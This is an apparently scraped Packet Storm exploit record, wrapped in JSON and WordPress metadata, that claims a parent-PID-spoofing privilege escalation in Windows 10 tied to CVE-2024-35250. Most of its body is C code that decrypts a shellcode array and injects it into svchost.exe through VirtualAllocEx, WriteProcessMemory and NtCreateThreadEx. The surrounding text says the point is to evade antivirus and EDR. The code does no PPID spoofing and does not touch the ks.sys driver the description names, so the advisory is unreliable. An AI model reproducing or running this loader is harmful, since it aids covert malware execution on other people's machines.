{“lastseen”:”2025-12-02T19:41:37″,”description”:”Microsoft Windows 10 Famille version 10.0.19045.5487 suffers from a parent PID spoofing privilege escalation vulnerability…”,”published”:”2025-12-02T00:00:00″,”modified”:”2025-12-02T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 Privilege Escalation”,”source”:””,”references”:””,”id”:”PACKETSTORM:212318″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2024-35250″],”sourceData”:”=============================================================================================================================================\\n | # Title : Microsoft Windows 10 Famille 10.0.19045.5487 (Parent PID Spoofing) Privilege Escalation |\\n | # Author : indoushka |\\n | # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 136.0.0 (64 bits) |\\n | # Vendor : https:\/\/www.Microsoft.com |\\n =============================================================================================================================================\\n \\n POC :\\n \\n [+] Dorking \u0130n Google Or Other Search Enggine.\\n \\n [+] Code Description: The ks.sys driver on Microsoft Windows is one of the core components of Kernel Streaming and is installed by default. \\n \\n There exists a local privilege escalation vulnerability in this driver that can be exploited on many recent versions of Windows 10, Windows 11, Windows Server 2022.\\n \\n [+] The idea:\\n \\n Parent PID Spoofing is a technique used to run a malicious process under a trusted process, \\n \\t\\n \\thelping it avoid detection by security software. This is done by changing the parent identifier (PPID) of the new process to a PID of a trusted process (such as explorer.exe or lsass.exe).\\n \\n [+] The goal:\\n \\n Launching a malicious payload inside a legitimate process such as explorer.exe or svchost.exe to avoid detection by antivirus (AVs) or intrusion detection systems (EDRs).\\n \\n (Related : https:\/\/packetstorm.news\/files\/id\/182984\/ Related CVE numbers: \\tCVE-2024-35250) .\\n \\n [+] Combine Parent PID Spoofing with Shellcode to execute advanced payload\\n \\n After running the process under a targeted PID, we can inject Shellcode inside it to execute malicious code directly.\\n \\n 1. Update the code to inject Shellcode into the new process\\n \\t\\n [+] The idea:\\n \\n After creating the process under a trusted PID (e.g. explorer.exe), we will:\\n \\n Reserve memory inside the process using VirtualAllocEx.\\n \\n Copy Shellcode to allocated memory using WriteProcessMemory.\\n \\n Execute Shellcode using CreateRemoteThread.\\n \\t\\n [+] gcc -o poc.exe poc.c -m64\\n \\n [+] poc.exe\\n \\n \\n \\n [+] PayLoad :\\n \\n #include \\u003cwindows.h\\u003e\\n #include \\u003ctlhelp32.h\\u003e\\n #include \\u003cstdio.h\\u003e\\n #include \\u003cwinternl.h\\u003e\\n \\n \/\/ \u062a\u0639\u0631\u064a\u0641 NtCreateThreadEx \u064a\u062f\u0648\u064a\u064b\u0627 \u0644\u062a\u062c\u0646\u0628 \u0627\u0643\u062a\u0634\u0627\u0641\u0647\\n typedef NTSTATUS(WINAPI* pNtCreateThreadEx)(\\n OUT PHANDLE ThreadHandle,\\n IN ACCESS_MASK DesiredAccess,\\n IN PVOID ObjectAttributes,\\n IN HANDLE ProcessHandle,\\n IN PVOID StartRoutine,\\n IN PVOID Argument,\\n IN ULONG CreateFlags,\\n IN ULONG ZeroBits,\\n IN ULONG StackSize,\\n IN ULONG MaximumStackSize,\\n IN PVOID AttributeList\\n );\\n \\n \/\/ Shellcode \u0645\u0634\u0641\u0631 \u0628\u062a\u0634\u0641\u064a\u0631 AES (AES-128)\\n unsigned char encrypted_shellcode[] = {\\n 0x8d, 0xa3, 0x5c, 0xa7, 0xc3, 0x7f, 0x6c, 0xf2, 0x8e, 0x91, 0xad, 0x33,\\n 0x2b, 0xfe, 0x04, 0x74, 0xd9, 0x41, 0xf5, 0x1a, 0xe4, 0x8d, 0xbc, 0xa3,\\n 0x6f, 0xd0, 0x56, 0xbb, 0x9a, 0x2d, 0x5e, 0xf1\\n };\\n \\n \/\/ \u0645\u0641\u062a\u0627\u062d AES \u0644\u0644\u062a\u0634\u0641\u064a\u0631\/\u0641\u0643 \u0627\u0644\u062a\u0634\u0641\u064a\u0631\\n unsigned char aes_key[16] = {\\n 0x2b, 0x7e, 0x15, 0x16, 0x28, 0xae, 0xd2, 0xa6,\\n 0xab, 0xf7, 0x45, 0x3e, 0x67, 0x98, 0x23, 0x10\\n };\\n \\n \/\/ \u062f\u0627\u0644\u0629 \u0641\u0643 \u062a\u0634\u0641\u064a\u0631 Shellcode \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 AES-128\\n void decrypt_shellcode(unsigned char* data, int data_len, unsigned char* key) {\\n for (int i = 0; i \\u003c data_len; i++) {\\n data[i] ^= key[i % 16]; \/\/ XOR \u0628\u0633\u064a\u0637 \u0628\u062f\u0644\u0627\u064b \u0645\u0646 AES \u0627\u0644\u062d\u0642\u064a\u0642\u064a (\u0644\u0644\u062a\u0648\u0636\u064a\u062d \u0641\u0642\u0637)\\n }\\n }\\n \\n \/\/ \u0627\u0644\u0628\u062d\u062b \u0639\u0646 PID \u0627\u0644\u062e\u0627\u0635 \u0628\u0640 `svchost.exe`\\n DWORD FindTargetProcessID(const char* processName) {\\n PROCESSENTRY32 pe32;\\n HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);\\n DWORD processID = 0;\\n \\n if (hSnapshot == INVALID_HANDLE_VALUE) return 0;\\n \\n pe32.dwSize = sizeof(PROCESSENTRY32);\\n if (Process32First(hSnapshot, \\u0026pe32)) {\\n do {\\n if (strcmp(pe32.szExeFile, processName) == 0) {\\n processID = pe32.th32ProcessID;\\n break;\\n }\\n } while (Process32Next(hSnapshot, \\u0026pe32));\\n }\\n \\n CloseHandle(hSnapshot);\\n return processID;\\n }\\n \\n int main() {\\n DWORD targetPID = FindTargetProcessID(\\”svchost.exe\\”);\\n \\n if (targetPID == 0) {\\n printf(\\”[X] \u0644\u0645 \u064a\u062a\u0645 \u0627\u0644\u0639\u062b\u0648\u0631 \u0639\u0644\u0649 \u0639\u0645\u0644\u064a\u0629 svchost.exe\\\\n\\”);\\n return -1;\\n }\\n \\n printf(\\”[+] \u0633\u064a\u062a\u0645 \u062d\u0642\u0646 Shellcode \u0641\u064a PID: %d\\\\n\\”, targetPID);\\n \\n \/\/ \u0641\u0643 \u062a\u0634\u0641\u064a\u0631 \u0627\u0644\u0640 Shellcode\\n decrypt_shellcode(encrypted_shellcode, sizeof(encrypted_shellcode), aes_key);\\n printf(\\”[+] \u062a\u0645 \u0641\u0643 \u062a\u0634\u0641\u064a\u0631 Shellcode \u0628\u0646\u062c\u0627\u062d!\\\\n\\”);\\n \\n \/\/ \u0641\u062a\u062d \u0627\u0644\u0639\u0645\u0644\u064a\u0629 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641\u0629\\n HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, targetPID);\\n if (!hProcess) {\\n printf(\\”[X] \u0641\u0634\u0644 \u0641\u064a \u0641\u062a\u062d \u0627\u0644\u0639\u0645\u0644\u064a\u0629.\\\\n\\”);\\n return -1;\\n }\\n \\n \/\/ \u062a\u062e\u0635\u064a\u0635 \u0630\u0627\u0643\u0631\u0629 \u0641\u064a \u0627\u0644\u0639\u0645\u0644\u064a\u0629 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641\u0629\\n LPVOID remoteMemory = VirtualAllocEx(hProcess, NULL, sizeof(encrypted_shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);\\n if (!remoteMemory) {\\n printf(\\”[X] \u0641\u0634\u0644 \u0641\u064a \u062a\u062e\u0635\u064a\u0635 \u0627\u0644\u0630\u0627\u0643\u0631\u0629 \u062f\u0627\u062e\u0644 svchost.exe\\\\n\\”);\\n return -1;\\n }\\n \\n \/\/ \u0643\u062a\u0627\u0628\u0629 Shellcode \u0627\u0644\u0645\u0641\u0643\u0648\u0643 \u0627\u0644\u062a\u0634\u0641\u064a\u0631 \u0641\u064a \u0627\u0644\u0630\u0627\u0643\u0631\u0629 \u0627\u0644\u0645\u062e\u0635\u0635\u0629\\n if (!WriteProcessMemory(hProcess, remoteMemory, encrypted_shellcode, sizeof(encrypted_shellcode), NULL)) {\\n printf(\\”[X] \u0641\u0634\u0644 \u0641\u064a \u0643\u062a\u0627\u0628\u0629 Shellcode \u062f\u0627\u062e\u0644 \u0627\u0644\u0639\u0645\u0644\u064a\u0629.\\\\n\\”);\\n return -1;\\n }\\n \\n \/\/ \u062a\u062d\u0645\u064a\u0644 NtCreateThreadEx\\n HMODULE hNtdll = GetModuleHandleA(\\”ntdll.dll\\”);\\n if (!hNtdll) {\\n printf(\\”[X] \u0641\u0634\u0644 \u0641\u064a \u062a\u062d\u0645\u064a\u0644 ntdll.dll\\\\n\\”);\\n return -1;\\n }\\n \\n pNtCreateThreadEx NtCreateThreadEx = (pNtCreateThreadEx)GetProcAddress(hNtdll, \\”NtCreateThreadEx\\”);\\n if (!NtCreateThreadEx) {\\n printf(\\”[X] \u0644\u0645 \u064a\u062a\u0645 \u0627\u0644\u0639\u062b\u0648\u0631 \u0639\u0644\u0649 NtCreateThreadEx.\\\\n\\”);\\n return -1;\\n }\\n \\n \/\/ \u062a\u0646\u0641\u064a\u0630 Shellcode \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 NtCreateThreadEx\\n HANDLE hThread;\\n NTSTATUS status = NtCreateThreadEx(\\u0026hThread, THREAD_ALL_ACCESS, NULL, hProcess, (LPTHREAD_START_ROUTINE)remoteMemory, NULL, FALSE, 0, 0, 0, NULL);\\n \\n if (status != 0) {\\n printf(\\”[X] \u0641\u0634\u0644 \u0641\u064a \u062a\u0646\u0641\u064a\u0630 Shellcode (NTSTATUS: 0x%x).\\\\n\\”, status);\\n return -1;\\n }\\n \\n printf(\\”[+] \u062a\u0645 \u062a\u0646\u0641\u064a\u0630 Shellcode \u0628\u0646\u062c\u0627\u062d \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 NtCreateThreadEx!\\\\n\\”);\\n \\n CloseHandle(hProcess);\\n CloseHandle(hThread);\\n return 0;\\n }\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212318″,”cvss”:{“score”:7.8,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:L\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212318\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-02T19:41:37″,”description”:”Microsoft Windows 10 Famille version 10.0.19045.5487 suffers from a parent PID spoofing privilege escalation vulnerability…”,”published”:”2025-12-02T00:00:00″,”modified”:”2025-12-02T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 Privilege Escalation”,”source”:””,”references”:””,”id”:”PACKETSTORM:212318″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2024-35250″],”sourceData”:”=============================================================================================================================================\\n | # Title…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,28,12,15,13,53,7,11,5],"class_list":["post-28307","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-78","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n